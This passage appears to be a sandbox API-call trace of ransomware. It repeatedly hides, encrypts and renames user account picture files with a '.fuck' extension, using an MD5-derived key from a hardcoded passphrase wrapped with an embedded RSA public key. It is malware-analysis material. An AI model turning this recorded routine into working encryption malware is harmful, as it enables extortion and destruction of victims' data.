(lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-192.png.gsg", dwFileAttributes=0x2) returned 0 [0237.821] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2858160) returned 1 [0237.824] CryptCreateHash (in: hProv=0x2858160, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0237.824] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0237.824] CryptHashData (hHash=0x28463e0, pbData=0x2ecaf8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.824] CryptDeriveKey (in: hProv=0x2858160, Algid=0x6610, hBaseData=0x28463e0, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x2845de0) returned 1 [0237.824] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.824] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0237.824] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x28582f8) returned 1 [0237.825] CryptImportPublicKeyInfo (in: hCryptProv=0x28582f8, dwCertEncodingType=0x1, pInfo=0x2850918*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2850948*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2850950*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x2846960) returned 1 [0237.825] CryptEncrypt (in: hKey=0x2846960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0237.825] CryptEncrypt (in: hKey=0x2846960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28592e8*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x28592e8*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0237.825] WriteFile (in: hFile=0x5d10, lpBuffer=0x28592e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x28592e8*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0237.826] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2868998, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2868998, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0237.826] CryptEncrypt (in: hKey=0x2845de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2868998*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x2868998*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0237.826] WriteFile (in: hFile=0x5d10, lpBuffer=0x2868998*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2868998*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0237.826] CloseHandle (hObject=0xffffffff) returned 1 [0237.826] CloseHandle (hObject=0x5d10) returned 1 [0237.827] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-192.png.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-192.png.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-192.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-192.png"), bFailIfExists=0) returned 0 [0237.831] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-192.png", dwFileAttributes=0x0) returned 0 [0237.832] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-192.png.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-192.png.gsg")) returned 0 [0237.832] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-192.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-192.png"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-192.png.fuck" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-192.png.fuck")) returned 0 [0237.832] CryptDestroyHash (hHash=0x28463e0) returned 1 [0237.832] CryptDestroyKey (hKey=0x2845de0) returned 1 [0237.832] CryptReleaseContext (hProv=0x2858160, dwFlags=0x0) returned 1 [0237.832] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.832] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0237.833] GetLastError () returned 0x5 [0237.833] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-32.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-32.png")) returned 0x20 [0237.833] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-32.png", dwFileAttributes=0x80) returned 0 [0237.833] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-32.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-32.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.833] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-32.png.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-32.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0237.833] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-32.png.gsg", dwFileAttributes=0x2) returned 0 [0237.834] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2858160) returned 1 [0237.836] CryptCreateHash (in: hProv=0x2858160, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0237.836] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0237.836] CryptHashData (hHash=0x28463e0, pbData=0x2ecaf8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.836] CryptDeriveKey (in: hProv=0x2858160, Algid=0x6610, hBaseData=0x28463e0, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x2846460) returned 1 [0237.836] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.836] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0237.836] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x28593f8) returned 1 [0237.837] CryptImportPublicKeyInfo (in: hCryptProv=0x28593f8, dwCertEncodingType=0x1, pInfo=0x2850b88*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2850bb8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2850bc0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x28465e0) returned 1 [0237.837] CryptEncrypt (in: hKey=0x28465e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0237.837] CryptEncrypt (in: hKey=0x28465e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2859a58*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x2859a58*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0237.837] WriteFile (in: hFile=0x5d10, lpBuffer=0x2859a58*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2859a58*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0237.838] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2868998, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2868998, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0237.838] CryptEncrypt (in: hKey=0x2846460, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2868998*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x2868998*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0237.838] WriteFile (in: hFile=0x5d10, lpBuffer=0x2868998*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2868998*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0237.838] CloseHandle (hObject=0xffffffff) returned 1 [0237.838] CloseHandle (hObject=0x5d10) returned 1 [0237.840] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-32.png.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-32.png.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-32.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-32.png"), bFailIfExists=0) returned 0 [0237.844] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-32.png", dwFileAttributes=0x0) returned 0 [0237.844] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-32.png.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-32.png.gsg")) returned 0 [0237.845] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-32.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-32.png"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-32.png.fuck" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-32.png.fuck")) returned 0 [0237.845] CryptDestroyHash (hHash=0x28463e0) returned 1 [0237.845] CryptDestroyKey (hKey=0x2846460) returned 1 [0237.845] CryptReleaseContext (hProv=0x2858160, dwFlags=0x0) returned 1 [0237.845] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.845] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0237.845] GetLastError () returned 0x5 [0237.845] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-40.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-40.png")) returned 0x20 [0237.846] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-40.png", dwFileAttributes=0x80) returned 0 [0237.846] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-40.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-40.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.846] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-40.png.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-40.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0237.847] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-40.png.gsg", dwFileAttributes=0x2) returned 0 [0237.847] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2858160) returned 1 [0237.849] CryptCreateHash (in: hProv=0x2858160, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0237.849] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0237.849] CryptHashData (hHash=0x2846460, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.849] CryptDeriveKey (in: hProv=0x2858160, Algid=0x6610, hBaseData=0x2846460, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x2845de0) returned 1 [0237.849] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.849] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0237.849] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x2859480) returned 1 [0237.850] CryptImportPublicKeyInfo (in: hCryptProv=0x2859480, dwCertEncodingType=0x1, pInfo=0x28509e8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2850a18*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2850a20*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x28466e0) returned 1 [0237.850] CryptEncrypt (in: hKey=0x28466e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0237.850] CryptEncrypt (in: hKey=0x28466e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2859618*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x2859618*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0237.850] WriteFile (in: hFile=0x5d10, lpBuffer=0x2859618*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2859618*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0237.851] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2868998, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2868998, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0237.851] CryptEncrypt (in: hKey=0x2845de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2868998*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x2868998*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0237.851] WriteFile (in: hFile=0x5d10, lpBuffer=0x2868998*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2868998*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0237.851] CloseHandle (hObject=0xffffffff) returned 1 [0237.851] CloseHandle (hObject=0x5d10) returned 1 [0237.856] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-40.png.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-40.png.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-40.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-40.png"), bFailIfExists=0) returned 0 [0237.859] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-40.png", dwFileAttributes=0x0) returned 0 [0237.859] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-40.png.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-40.png.gsg")) returned 0 [0237.860] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-40.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-40.png"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-40.png.fuck" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-40.png.fuck")) returned 0 [0237.860] CryptDestroyHash (hHash=0x2846460) returned 1 [0237.860] CryptDestroyKey (hKey=0x2845de0) returned 1 [0237.860] CryptReleaseContext (hProv=0x2858160, dwFlags=0x0) returned 1 [0237.860] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.860] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0237.862] GetLastError () returned 0x5 [0237.862] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-48.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-48.png")) returned 0x20 [0237.862] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-48.png", dwFileAttributes=0x80) returned 0 [0237.862] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-48.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-48.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.862] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-48.png.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-48.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0237.863] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-48.png.gsg", dwFileAttributes=0x2) returned 0 [0237.863] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2858160) returned 1 [0237.865] CryptCreateHash (in: hProv=0x2858160, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0237.865] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0237.865] CryptHashData (hHash=0x2846460, pbData=0x2ecaf8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.865] CryptDeriveKey (in: hProv=0x2858160, Algid=0x6610, hBaseData=0x2846460, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x2845de0) returned 1 [0237.865] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.865] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0237.865] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x2859508) returned 1 [0237.866] CryptImportPublicKeyInfo (in: hCryptProv=0x2859508, dwCertEncodingType=0x1, pInfo=0x2850778*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28507a8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28507b0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x2846660) returned 1 [0237.866] CryptEncrypt (in: hKey=0x2846660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0237.866] CryptEncrypt (in: hKey=0x2846660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2859c78*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x2859c78*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0237.866] WriteFile (in: hFile=0x5d10, lpBuffer=0x2859c78*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2859c78*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0237.867] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2868998, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2868998, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0237.867] CryptEncrypt (in: hKey=0x2845de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2868998*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x2868998*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0237.867] WriteFile (in: hFile=0x5d10, lpBuffer=0x2868998*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2868998*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0237.867] CloseHandle (hObject=0xffffffff) returned 1 [0237.867] CloseHandle (hObject=0x5d10) returned 1 [0237.868] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-48.png.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-48.png.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-48.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-48.png"), bFailIfExists=0) returned 0 [0237.872] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-48.png", dwFileAttributes=0x0) returned 0 [0237.872] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-48.png.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-48.png.gsg")) returned 0 [0237.873] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-48.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-48.png"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-48.png.fuck" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-48.png.fuck")) returned 0 [0237.873] CryptDestroyHash (hHash=0x2846460) returned 1 [0237.873] CryptDestroyKey (hKey=0x2845de0) returned 1 [0237.873] CryptReleaseContext (hProv=0x2858160, dwFlags=0x0) returned 1 [0237.873] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.874] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0237.874] GetLastError () returned 0x5 [0237.874] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp")) returned 0x20 [0237.874] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp", dwFileAttributes=0x80) returned 0 [0237.874] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.874] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0237.876] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp.gsg", dwFileAttributes=0x2) returned 0 [0237.876] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2858160) returned 1 [0237.878] CryptCreateHash (in: hProv=0x2858160, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0237.878] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0237.878] CryptHashData (hHash=0x2845de0, pbData=0x2ecaf8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.878] CryptDeriveKey (in: hProv=0x2858160, Algid=0x6610, hBaseData=0x2845de0, dwFlags=0x1000000, phKey=0x2b9e05c | out: 